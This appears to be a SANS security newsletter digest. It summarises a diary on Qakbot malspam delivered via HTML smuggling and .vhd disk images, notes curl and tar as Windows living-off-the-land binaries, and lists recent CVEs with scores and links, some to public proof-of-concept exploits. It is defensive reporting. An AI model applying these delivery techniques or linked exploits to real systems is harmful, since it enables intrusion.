The Consensus Security Vulnerability Alert

INTERNET STORM CENTER SPOTLIGHT

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html


obama224 distribution Qakbot tries .vhd (virtual hard disk) 2022-12-02

Published: 2022-12-02
Last Updated: 2022-12-02 06:47:42 UTC
by Brad Duncan (Version: 1)

Introduction

Qakbot (also called Qbot) is a long-running malware family that has seen wide-spread distribution through malicious spam (malspam) in recent years. During an infection, Qakbot performs different functions as an information stealer, backdoor, and malware downloader.

Metadata tags in the malware code are tied to a specific distribution campaign. The "obama" series distribution tag includes a 3-digit suffix, and it currently represents thread-hijacked emails with attachments for HTML smuggling. When opened, the attached HTML file presents a password-protected zip archive to download, and the web page displays the password.

In recent months, password-protected zip archives for Qakbot have contained disk images using the .iso file extension. However, on Thursday 2022-12-01, zip archives for obama224 Qakbot contained images using the .vhd file extension.

VHD files have been used by other criminal groups to distribute malware, but this is the first I remember seeing them for obama-series Qakbot.

In Microsoft Windows, ISO files can easily be mounted by any normal user account. However, VHD images require an administrative Windows account. Because of this, normal user accounts in an Active Directory (AD) environment cannot mount VHD files on a Windows client without administrative login credentials. VHD images can easily mount on stand-alone Windows 10 or 11 hosts that use administrative accounts.

Read the entire diary entry:
https://isc.sans.edu/diary/obama224+distribution+Qakbot+tries+vhd+virtual+hard+disk+images/29294/



Linux LOLBins Applications Available in Windows Published: 2022-12-03

Last Updated: 2022-12-03 20:09:25 UTC
by Guy Bruneau (Version: 1) Some useful Linux applications that are now part of default installation in Windows 10, Windows Server 2019/2022 (LOLBins - Living Off the Land Binaries).

cURL

The first one is curl which can be very useful for scripting to download or upload files and/or use with a username/password (curl --help) and save the output either to a new filename or the same:

tar

The next application is tar (tar --help) is used to store, extract and manipulate archive files. Let’s take the previous file Example.csv, archive and compress it and then review the result. Using the same options as Linux will use gzip compression and create the file...


Read the entire diary entry:
https://isc.sans.edu/diary/Linux+LOLBins+Applications+Available+in+Windows/29296/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2022-34721 - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34722.
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-34721
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8270



CVE-2021-35587 - Oracle Fusion Middleware Unspecified Vulnerability
CVSS Score: 0
** KEV since 2022-11-28 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-35587
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8270



CVE-2022-44721 - CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)
CVSS Score: 4.9
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44721
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8276
NVD References: https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller



CVE-2022-4262 - Chromium: CVE-2022-4262 Type Confusion in V8
CVSS Score: 0
** KEV since 2022-12-05 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4262
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-4262
NVD References:
- https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html
- https://crbug.com/1394403



CVE-2022-4116 - A vulnerability was found in quarkus. This security flaw happens in Dev UI Config Editor which is vulnerable to drive-by localhost attacks leading to remote code execution.
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4116
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8274



CVE-2022-42109 - Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42109
NVD References:
- https://github.com/PuneethReddyHC/online-shopping-system-advanced
- https://medium.com/@grimthereaperteam/online-shopping-system-advanced-sql-injection-at-product-php-c55c435c35c2



CVE-2022-44038 - Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44038
NVD References: https://cyber-guy.gitbook.io/cyber-guys-blog/pocs/cve-2022-44038



CVE-2022-44354 - SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44354
NVD References: https://github.com/strik3r0x1/Vulns/blob/main/Unrestricted%20File%20Upload_%20SolarView%20Compact%204.0%2C5.0.md



CVE-2022-3751 - SQL Injection in GitHub repository owncast/owncast prior to 0.0.13.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-3751
NVD References:
- https://github.com/owncast/owncast/commit/23b6e5868d5501726c27a3fabbecf49000968591
- https://huntr.dev/bounties/a04cff99-5d53-45e5-a882-771b0fad62c9



CVE-2022-44096 - Sanitization Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44096
NVD References: https://github.com/upasvi/CVE-/issues/1



CVE-2022-44097 - Book Store Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44097
NVD References: https://github.com/upasvi/CVE-/issues/2



CVE-2022-4222 - A vulnerability was found in SourceCodester Canteen Management System. It has been rated as critical. This issue affects the function query of the file ajax_invoice.php of the component POST Request Handler. The manipulation of the argument search leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214523.
CVE-2022-4229 - A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.
CVE-2022-4232 - A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4222
NVD References:
- https://vuldb.com/?id.214523
- https://www.jianshu.com/p/bda61089bf1d
- https://github.com/lithonn/bug-report/tree/main/vendors/oretnom23/bsms_ci/broken-access-control
- https://vuldb.com/?id.214588
- https://vuldb.com/?id.214590



CVE-2022-44136 - Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE).
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44136
NVD References: https://com0t.github.io/zenar.io/2022/10/18/Unauthent-RCE-Zenar.io~9.3.html



CVE-2022-44151 - Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44151
NVD References: https://github.com/li-baige/bug_report/blob/main/vendors/oretnom23/Simple%20Inventory%20Management%20System/SQLi-1.md



CVE-2022-46162 - discourse-bbcode is the official BBCode plugin for Discourse. Prior to commit 91478f5, CSS injection can occur when rendering content generated with the discourse-bccode plugin. This vulnerability only affects sites which have the discourse-bbcode plugin installed and enabled. This issue is patched in commit 91478f5. As a workaround, ensure that the Content Security Policy is enabled and monitor any posts that contain bbcode.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-46162
NVD References:
- https://github.com/discourse/discourse-bbcode/commit/91478f5cfecdcc43cf85b997168a8ecfd0f8df90
- https://github.com/discourse/discourse-bbcode/security/advisories/GHSA-8c87-xpqv-c7mp



CVE-2022-44262 - ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44262
NVD References: https://github.com/ff4j/ff4j/issues/624



CVE-2022-36431 - An arbitrary file upload vulnerability in Rocket TRUfusion Enterprise before 7.9.6.1 allows unauthenticated attackers to execute arbitrary code via a crafted JSP file. Issue fixed in version 7.9.6.1.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-36431
NVD References:
- https://docs.rocketsoftware.com/bundle/TRUfusionEnterprise_ReleaseNotes_V7.9.6.1/resource/TRUfusionEnterprise_ReleaseNotes_V7.9.6.1.pdf
- https://www.synacktiv.com/sites/default/files/2022-11/trufusion_enterprise_unauthenticated_arbitrary_file_write.pdf



CVE-2022-4247 - A vulnerability classified as critical was found in Movie Ticket Booking System. This vulnerability affects unknown code of the file booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214624.
CVE-2022-4248 - A vulnerability, which was classified as critical, has been found in Movie Ticket Booking System. This issue affects some unknown processing of the file editBooking.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214625 was assigned to this vulnerability.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4247
NVD References:
- https://github.com/aman05382/movie_ticket_booking_system_php/issues/1
- https://vuldb.com/?id.214624
- https://github.com/aman05382/movie_ticket_booking_system_php/issues/3
- https://vuldb.com/?id.214625



CVE-2022-4221 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Asus NAS-M25 allows an unauthenticated attacker to inject arbitrary OS commands via unsanitized cookie values.This issue affects NAS-M25: through 1.0.1.7.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4221
NVD References: https://onekey.com/blog/security-advisory-asus-m25-nas-vulnerability/



CVE-2022-1471 - SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-1471
NVD References: https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2



CVE-2022-3270 - In multiple products by Festo a remote unauthenticated attacker could use functions of an undocumented protocol which could lead to a complete loss of confidentiality, integrity and availability.
CVSS Score: 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-3270
NVD References: https://cert.vde.com/en/advisories/VDE-2022-041/



CVE-2022-30528 - SQL Injection vulnerability in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to execute arbitrary commands via the username parameter to /system/user/modules/mod_users/controller.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-30528
NVD References:
- https://github.com/asith-eranga/isic
- https://github.com/killmonday/isic.lk-RCE



CVE-2022-37016 - Symantec Endpoint Protection (Windows) agent may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-37016
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/21014



CVE-2022-4257 - A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4257
NVD References:
- https://github.com/siriuswhiter/VulnHub/blob/main/C-Data/rce1.md
- https://vuldb.com/?id.214631